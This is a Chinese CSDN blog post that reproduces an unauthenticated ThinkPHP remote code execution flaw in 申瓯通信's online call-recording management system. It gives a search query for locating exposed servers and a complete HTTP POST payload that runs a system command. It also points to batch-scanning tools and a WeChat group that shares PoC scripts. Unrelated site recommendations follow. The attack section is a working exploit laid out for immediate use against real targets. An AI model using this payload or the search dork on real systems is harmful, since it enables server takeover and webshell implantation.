【漏洞复现】申瓯通信在线录音管理系统Thinkphp远程代码执行漏洞

最新推荐文章于 2024-06-26 14:06:00 发布
最新推荐文章于 2024-06-26 14:06:00 发布
阅读量524 收藏 2
点赞数 13
分类专栏: 漏洞复现篇 文章标签: 申瓯通信 代码执行 thinkphp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60571842/article/details/139881024
版权

0x01 产品简介

申瓯通信在线录音管理系统是一款功能强大的录音管理解决方案,旨在满足公司、集团单位在区域分布下对录音数据的集中管理需求。该系统基于SOC1900、S0C1600等系列录音盒开发,是一个多线路、多设备、多区域的录音统一管理平台。该系统将各个分点的录音盒的录音统一集中到服务器,便于总部人员快速查看和管理,从而提升企事业单位的服务质量和管理效率。

0x02 漏洞概述

申瓯通信在线录音管理系统存在Thinkphp远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。

0x03 搜索语法

title="在线录音管理系统"

在这里插入图片描述

0x04 漏洞复现

POST /callcenter/public/index.php/index.php?s=index/index/index HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
 
s=id&_method=__construct&method=POST&filter[]=system

在这里插入图片描述

0x05 工具批量

nuclei

在这里插入图片描述

afrog

在这里插入图片描述

xray

在这里插入图片描述

POC脚本获取

请使用VX扫一扫加入内部POC脚本分享圈子
在这里插入图片描述

SuperherRo
关注
  • 13
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
申瓯通信 在线录音管理系统 Thinkphp 远程代码执行漏洞复现
0xSec
06-21 631
申瓯通信 在线录音管理系统 存在Thinkphp 远程代码执行漏洞,未经身份验证的远程攻击者可以利用此漏洞执行任意指令或写入webshell,导致服务器权限被控,造成严重威胁。
申瓯HJK-120程控交换机管理系统
01-23
申瓯HJK-120程控交换机管理系统是一款专为申瓯HJK-120系列交换机设计的PC端管理软件,旨在提高通信设备的管理和调试效率,减少传统通过座机进行编程的繁琐步骤。该系统以其便捷的操作界面和强大的功能,为企业通信...
申瓯通信在线录音管理系统任意文件读取漏洞复现
The current road is different, love needs to distinguish between right and wrong
06-26 155
申瓯通信设备有限公司在线录音管理系统 download 接口处任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件、数据库配置文件等等,导致网站处于极度不安全状态。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
某购物商城系统commodtiy接口处存在任意文件上传漏洞
weixin_43167326的博客
05-10 773
某购物商城系统commodtiy接口处存在任意文件上传漏洞,恶意攻击者可以上传恶意软件,例如后门、木马或勒索软件,以获取对服务器的远程访问权限或者破坏系统,对服务器造成极大的安全隐患。
申瓯Soc3100电话交换机管理系统端控制软件.rar
09-05
早期WIN9X/XP系统上运行的管理系统,在WIN7上也能使用,支持综合监控与动态监控。功能包括以下设置项目:中继开关、计费方式、转接方式、发码方式、出局方式、中继方向、拆线方式、H信令、组号、板号是否转发、是否...
SOC1800电话录音系统用户手册
11-29
**SOC1800电话录音系统**是申瓯通信设备有限公司推出的一款高性能多路电话录音解决方案,旨在为企业提供高质量的通话记录服务。该系统具备以下特点: - **高容量录音**:支持多路电话同时录音,满足大中型企业的需求...
申瓯HJK-120(D)软件
04-29
申瓯HJK-120(D)软件是一款专为申瓯通信系统设计的应用程序,它主要用于管理和维护申瓯HJK-120(D)系列的通信设备。这款软件集成了丰富的功能,旨在提升通信系统的效率和稳定性,为用户提供便捷的操作体验。 首先,...
SOC1800电话录音系统用户手册范本.doc
09-25
用户需要登录 web 网管来管理录音,包括设置系统 IP 地址、管理员管理、系统信息、WEB IP 地址设置、设置 MAC 地址、恢复出厂设置、在线升级、设置系统实时时钟、权限管理和管理员管理等。 5. 录音管理 用户可以...
Deep Coral源码(深度相关性学习)
07-25
Deep Coral(深度相关性学习)迁移学习网络资源 Deep Coral是一种先进的迁移学习技术,专注于通过学习源域和目标域之间的相关性来提高模型的泛化能力。这种方法在处理不同数据分布的问题时表现出色,尤其是在无监督领域自适应的场景中。 Deep Coral网络核心特点: 相关性学习 - Deep Coral通过学习源域和目标域特征之间的相关性,减少领域差异,提高模型的泛化能力。 无监督学习 - 该方法无需目标域的标签信息,即可实现有效的领域自适应,适合标签稀缺的场景。 灵活性 - 该网络结构灵活,可以适用于多种不同的迁移学习场景,包括但不限于图像分类、语义分割等。
codeforces round 961 (div. 2)
07-25
A题 思路:对角线上的个数为:n,n-1(2个),n-2(2个),n-3(2个),......,1(2个) AC代码: #pragma GCC optimize("O2") #pragma GCC optimize("O3") #include <bits/stdc++.h> using namespace std; #define int long long #define double long double typedef long long ll; typedef unsigned long long ull; typedef pair<int, int> pii; const int N = 1e5 + 5, M = 1e7 + 5, S = 1e6 + 5, inf = 0x3f3f3f3f3f3f3f3f, mod = 1e9 + 7; int n, k; void solve() { cin >> n >> k; vector<int> v; for (int i = n; i >= 1; i--) { if (i
毕业设计:基于Springboot的多媒体信息共享平台
07-25
随着信息时代的到来,传统武理多媒体信息共享管理方式的弊端日益显现。针对这些问题,本文分析了传统方式的不足,并采用计算机技术构建武理多媒体信息共享系统。通过查阅相关文献和研究国内外相关技术,本文提出了一种集作品信息管理与信息共享于一体的系统构建方案。 本系统采用B/S架构,结合Spring Boot框架和MySQL数据库技术,针对国内武理多媒体信息共享系统的现状进行开发。系统包含个人中心、用户管理、作品分类管理、作品信息管理、私聊信息管理、系统管理等多个功能模块。经过测试,本系统达到了设计目标,相较于人工管理方式,显著降低了武理多媒体信息共享管理的经济成本,并大幅提升了管理效率。
2022年河南省特岗教师招聘考试题(考生回忆版).pdf
07-25
2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版).pdf2022年河南省特岗教师招聘考试题(考生回忆版)
b194红色革命文物征集管理系统-springboot+vue+elementui.zip(可运行源码+sql文件+文档)
最新发布
07-25
红色革命文物征集管理系统在对开发工具的选择上也很慎重,为了便于开发实现,选择的开发工具为Eclipse,选择的数据库工具为Mysql。以此搭建开发环境实现红色革命文物征集管理系统的功能。其中管理员管理用户,新闻公告。 红色革命文物征集管理系统是一款运用软件开发技术设计实现的应用系统,在信息处理上可以达到快速的目的,不管是针对数据添加,数据维护和统计,以及数据查询等处理要求,红色革命文物征集管理系统都可以轻松应对。 用户信息管理页面,此页面提供给管理员的功能有:用户信息的查询管理,可以删除用户信息、修改用户信息、新增用户信息,还进行了对用户名称的模糊查询的条件。文物信息管理页面,此页面提供给管理员的功能有:查看已发布的文物信息数据,修改文物信息,文物信息作废,即可删除,还进行了对文物信息名称的模糊查询 文物信息信息的类型查询等等一些条件。论坛信息管理页面,此页面提供给管理员的功能有:根据论坛信息进行条件查询,还可以对论坛信息进行新增、修改、查询操作等等。公告信息管理页面,此页面提供给管理员的功能有:根据公告信息进行新增、修改、查询操作等等。
基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip
07-25
基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip 【备注】 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用!有问题请及时沟通交流。 2、适用人群:计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工下载使用。 3、用途:项目具有较高的学习借鉴价值,不仅适用于小白学习入门进阶。也可作为毕设项目、课程设计、大作业、初期项目立项演示等。 4、如果基础还行,或热爱钻研,亦可在此项目代码基础上进行修改添加,实现其他不同功能。 欢迎下载!欢迎交流学习!不清楚的可以私信问我! 基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip基于Django+python编写开发的毕业生就业管理系统支持学生教师角色+db数据库(毕业设计新项目).zip
前端-JavaScrip-Promise-手写Promise
07-25
手写Promise源码 遵循Pormise/A+规范 适合学习Promise源码的同学
《AI大模型应用》--学生作业帮,包含文心一言应用,GPTs,通义千问以及相关插件服务.zip
07-25
个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸! 个人深耕AI大模型应用领域积累的成果,希望对您有所帮助。有大模型账号、环境问题、AI大模型技术应用落地方案等相关问题,欢迎详聊,能为您解决问题是我的荣幸!
毕设新项目基于python3.7+django+sqlite开发的学生就业管理系统源码+使用说明(含vue前端源码).zip
07-25
毕设新项目基于python3.7+django+sqlite开发的学生就业管理系统源码+使用说明(含vue前端源码).zip 【备注】 1、该资源内项目代码都经过测试运行成功,功能ok的情况下才上传的,请放心下载使用!有问题请及时沟通交流。 2、适用人群:计算机相关专业(如计科、信息安全、数据科学与大数据技术、人工智能、通信、物联网、自动化、电子信息等)在校学生、专业老师或者企业员工下载使用。 3、用途:项目具有较高的学习借鉴价值,不仅适用于小白学习入门进阶。也可作为毕设项目、课程设计、大作业、初期项目立项演示等。 4、如果基础还行,或热爱钻研,亦可在此项目代码基础上进行修改添加,实现其他不同功能。 欢迎下载!欢迎交流学习!不清楚的可以私信问我! 学生就业管理系统(前端) ## 项目开发环境 - IDE: vscode - node版本: v12.14.1 - npm版本: 6.13.4 - vue版本: @vue/cli 4.1.2 - 操作系统: UOS 20 ## 1.进入项目目录安装依赖 ``` npm install ``` ## 2.命令执行进入UI界面进行项目管理 ``` vue ui ``` ## 3.编译发布包(请注意编译后存储路径) #### PS:需要将编译后的包复制到后端项目的根目录下并命名为'static' 学生就业管理系统(后端) ## 1.项目开发环境 - IDE: vscode - Django版本: 3.0.3 - Python版本: python3.7.3 - 数据库 : sqlite3(测试专用) - 操作系统 : UOS 20 ## 2.csdn下载本项目并生成/安装依赖 ``` pip freeze > requirements.txt pip install -r requirements.txt ``` ## 3.项目MySQL数据库链接错误 [点击查看解决方法](https://www.cnblogs.com/izbw/p/11279237.html)
Matlab实现黏菌优化算法SMA-TCN-Multihead-Attention多输入单输出回归预测算法研究.rar
07-25
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计算机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。 5.作者介绍:某大厂资深算法工程师,从事Matlab算法仿真工作10年;擅长智能优化算法、神经网络预测、信号处理、元胞自动机等多种领域的算法仿真实验,更多仿真源码、数据集定制私信+。 替换数据可以直接使用,注释清楚,适合新手
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SuperherRo

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值